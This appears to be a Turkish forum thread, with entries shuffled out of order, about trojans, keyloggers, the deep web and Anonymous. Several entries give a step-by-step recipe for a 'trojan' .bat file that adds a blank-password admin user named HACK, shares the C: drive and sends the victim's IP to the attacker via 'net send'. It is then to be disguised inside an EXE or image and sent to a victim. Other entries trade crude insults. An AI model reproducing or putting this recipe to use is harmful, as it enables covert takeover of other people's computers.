-
26.
+3 -1Trojen atmayla hacker oldu amk evladı
-
27.
+4Piyasada bu konuda son derece fonksiyonel bircok Trojan var fakat bu trojanlari kodlayanlarin hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklidirlar, Trojanlarin Special Edition olan versiyonlarinin disindaki tüm Public versiyonlari maalesef AV lerce taninmakta ve hepsinden önemlisi Firewallar tarafindan bloke edilmektedirler ve bu da kullanicilarin isini oldukca zorlastirmaktadir.
-
28.
+3Deep Web sitelerine Nasıl ulaşılır?
Önceki bölümde uzun uzadıya açıklandığı gibi Deep Web, sahip olduğu bu derinlik iddialarını aslında bilinmezliğinden alıyor. Ne kadar derin veya ne tarz sitelere veya kişilere ulaşılma verilerinin analizleri de, yine erişim zorlukları nedeniyle net olarak gerçekleştirilemiyor. -
-
1.
0Kardesim peki bilgisayarda keylogger oldugunu nasil anlariz internette bir sey buldum cmd ye netstat -an | find ":25" yazinca bir sey cikmamasi gerekiyormuş fakat bende 3 tane UDP bir seyler yaziyor sence ne yapmaliyim acil yanitlarsan iyi olur
-
1.
-
29.
+3Dolayısıyladır ki, özellikle merak için Tor Ağı’nı kullanan ve Darknet sitelerine erişmek isteye kimseler, sahte veya ortalama siteler ile karşılaşmaları muhtemel kimselerden olabilirler. Bununla beraber Tor Ağı kullanıyor olmaları da, IP adreslerinin bir yerlerde iz bırakmasıyla da sonuçlanıyor olacaktır.
-
30.
+3Beyler ben pentration test ile ilginen birisi olarak şunu söyliyim keylogger ve trojen bir bruteforce yöntemidir ve bunlar en basitidir ve düşmanın yemesi gerekir ki windows bile kolayca bunları algılayıp hemen önlemektedir açmak istersenizde zaten sizden şifre ister(kendi pcnizin eminmisiniz diye yani karşı taraf iyice ikna olur virüs olduğuna) bunlarla uğraşmayın boşa kürek çekersiniz ki bu arkadaş hacker değil lammerdır lammerla kendini hacker gibi gösteren siyah şapkalı insanlardır hangi işletim sistemi olduğunu söylemiycem bilen bilir(a işletim sistemi diyelim) CRRACKING ve pentration test için çok uygun bir ortamdır ve burada keylogger ve trojen dışında bilgisiyarın sisteminde birçok crackleme aleti bulunur lütfen böyle insanlara inanıp bilgisayarıza zarar vermeyin eğer hacklemek istiyosanız araştırın ve siber güvenlik ve yazılımı öğrenip sonra gerekli işletim sistemini bulup saldırınızı gerçekleştiriniz(inkilapta bile bilgisayar bölümü var oradan ihtiyacınız olan kitapları alınız bende hacking için 3 kitap var adını isteyenlere verebilirim bu kitaptakiler en basic olanlarıdır) tekrar ediyorum böyle lammerla yol vermeyin öğrencekseniz zarrarları ve cezalarıyla öğrenin yoksa hem bilgisayınıza zarar verir hemde çok karanlık biir yerde fenersiz dolaşır gibi ne yaptığınızı bilmeden kendinizi çok kötü yollara atabilirsiniz.
-
-
1.
0ee aga kitaplarda ne yazıyo peki mesela örneklenir az
-
2.
0senin bu gördüğün trojen vb.şeyler varya onlar olmadan nasıl sisteme sızılcağı onlara karşı güvenlik önlemi spoofing(ağ dinleme) şifre kırma mantıkları cookie poisining ve daha fazla çok şey var okuyan yok zaten sistemin adı kali linux kitapların adı
Kali linux
Hacking interface
3.sünün adını unutum eve dönünce bulur yazarım
-
1.
-
31.
+3heyçkır mısın sen
-
-
1.
0Değilim olmaya çalışıyoz gülüm
-
2.
-1huur cocu sen oybirinciydin ne ara önüncü oldun aq
-
-
1.
0senin gibi aptal huur çocuklarını kandırıyodum hahaha
-
1.
-
3.
0Heyçkır benim o bebe
diğerleri 1 -
1.
-
32.
+3Scientology Kilisesi'nin çağrı hatlarını kitlediler ve sürekli olarak siyah fax göndererek yazıcı tonerinin bitmesine neden oldular. Daha sonrasında sitelerine erişimi kestiler. Site çökük bir vaziyetteyken Anonymous ilişkili birçok isim YouTube'da robot sesi kullanarak bir mesaj yayınladı. Mesajda "takipçilerinizin ve internetin iyiliği için, sizi internetten sileceğiz" deniyordu. Scientology Kilisesi'nin önemli isimlerinden Tom Cruise da Anonymous'tan nasibini alan isimler arasındadır.
-
33.
+3Deep Web ne kadar büyük?
Ancak bu konu biraz şaibeli… Zira geçtiğimiz günlerde yayınlanan bir rapora göre, bu onlarca katlık farkın doğruyu yansıtmadığı iddia edilmişti. Aslında bu konuda net olarak konuşabilmek mümkün olmuyor.
Zira Deep Web’in temel amacının da gizlilik olduğundan, gerçekte ne kadar site veya veri olduğu kesin şekilde analiz edilemiyor. Yani Deep Web, açık internetin onlarca katı mı sorusuna "Evet" ya da "Hayır" demek doğru olmayacaktır. -
34.
+3Deep Web'in başlıca örneği: Wikileaks!
Bilindiği gibi devletlere ait gizli belgeleri sızdıran Wikileaks, ilk etapta biraz önce tanımladığımız Brightnet kapsamında yer alıyordu. Yani Darknet’in içerikleri gibi insanlık dışı değil ancak doğrudan Deep Web içeriği olarak tanımlanamayacak kadarda özel içerikler sunuyordu.
Daha sonraları Wikileaks, Deep Web içerisinde gizliliğini yitirmeye başladı ve herkese açık olarak indekslenebilir yani bulunabilir hale getirildi.
Deep Web’in bu şekilde sahip olduğu çok seviyeli/katmanlı yapısı, daha önce belirttiğimiz veri büyüklüğü bilinmezliğinin de başlıca sebeplerinden oluyor... -
35.
+2Usta sözlük yararlı bilgilerle dolmaya başladı bu ne amk
-
-
1.
0Bide sizin gii güzel insanlardan destek gelince 10 numara 5 yıldız oluyo
-
1.
-
36.
+2Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C: sürücüsüne sizar istediginizi yaparsiniz.
Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir. -
37.
+2Anonoymous saldırıları
Ana akım medyada ilk çıkışlarını, bir otel sitesine aynı profil fotoğrafı ve kimlikle kayıt olmaları ve siteyi kullanılmaz hale getirmeleriyle yaptılar. Bu saldırıları sonucunda "steroid basmış hackerlar", "evcil teröristler" gibi isimler kazandılar. Daha sonrasında bu tip saldırıları internet genelinde yapmaya devam ettiler.
2004 yılından beri yaptıkları site çökertme işine günümüzde de devam ediyorlar. -
38.
+2DarkNet Siteleri ne kadar gerçek?
Çoğunlukla savsata olarak değerlendirilen bu suç gerektiren kategorilerde yer alan Darknet siteleri, kurucuları tarafından büyük bir hassasiyetle gizli tutulmaya çalışılıyor. Daha önce de belirtildiği gibi, herhangi bir arama motoru ile Deep Web sitelerine ulaşmak mümkün değildir.
Aslı olan Darknet siteleri de genel olarak IP tabanlı erişime imkan sunarlar ve bu adreslerin bilgileri sadece el altından, ciddi alıcı olduğuna inanılan kişilere ulaştırılır. Yani gerçek anlamda, silah satışı, kiralık katil ilanı veya sahte pasaport temini sağlayan sitelere ulaşmak, ciddi anlamda güçtür. -
39.
+24-) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;
net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan
Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin. -
40.
+24-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.
Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.
net start Messenger
Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardigib sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi olur.
Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.
Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C: sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir. -
41.
+2Trojan Nasil Yapilir?
Evet arkadaslar, konunun basligindan da anlayabileceginiz gibi Anti Virus programlari tarafindan taninmayan tamamen size ait bir trojan yapmayi size kisaca anlatacagim;
Trojanin ana amaci, adindan da anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi toplamaktir. Dikkat edin zarar vermek demiyorum cünkü bu etik olarak yanlis bir harekettir -
42.
+2Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir toola ihtiyaciniz yoktur.
Simdi Trojanimizi hazirlamaya baslayalim;
1-) Öncelikle bir TXT dosyasi acin ve icine su komutu girin;
net user HACK /add
Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz; -
43.
+1öğret dostum öğret çoluk çocuk keyloger atsin birbirine
-
44.
-1Kendilerine "Anon" ismini veren gurup, Wikileaks ve Occupy haraketlerinin de başlangıcının merkezinde bulunuyor. Anonymous ile ilgili olabileceği düşünülen ve aralarında Amerika, ingiltere, Avustralya, Hollanda, ispanya ve Türkiye'nin bulunduğu altı ülkede, onlarca kişi tutuklandı. Anonymous destekçileri, gurubu "Özgürlük Savaşçıları" veya "Dijital Robin Hood" gibi isimlerle anarlar.
-
45.
+1Aslında Tor Ağı, temel olarak bir VPN servisi ile benzerlik gösteriyor. Tor Browser ile erişilen Tor Ağı, kullanıcıyı Dünya üzerindeki birçok noktadaki farklı bilgisayarlar üzerinden geçiren bir bağlantı sağlıyor. Yani VPN servisinde olduğu gibi Dünya’nın belli bir noktasındaki sunucudan değil de, birçok farklı bölgedeki birçok farklı bilgisayarlar üzerinden erişim sağlıyor.
-
ccc rammstein ccc günaydın diler 24 12 2024
-
bu sözlük normal bir sözlük değil
-
mematinin yoklugunda tip okuyan
-
ördek polat
-
memati bu ne
-
böyle sözlüğü gibim sokum
-
beyler endonezyadaki yengeniz foto attı
-
31spor un görsellerine bakıyorum sadece
-
ne zaman misafir ve çocukları bize gelse
-
the vikings beni takip etmeyi bıraktı
-
türkiyedeki insanlar özet
-
kamil muhalefet olma
-
didem soydan bile kürt olduğunu kabul etti
-
yılbaşının kutlanılmasına izin vermeyeceğiz
-
kaptan kirk maasin kac olacak
-
yüzde 25 zam yapıldıysa benim en az
-
fenerbahce de futboldan anlayan adam
-
bu balili kızla evlenilir mi
-
özbek bir eleman gelir
-
bütün dünya duysun şuan da evdeyim
-
kızıl goncalar ürün yerleştirmeli reklamlar
-
atatürk de yılbaşı kutlardı
-
ocakta çalıştığım projenin geleceği belli olacak
-
inci sözlük bir koğuştur
-
derdiniz zerre gibimizde değil
-
kadınlara nası ilgi duyuyorsunuz
-
yeni yıldan şahsi beklentim
-
tecavüzün milim uzağındayım
-
bu ülkede ezelden beri müslüman
-
wow girl olarak memem
- / 1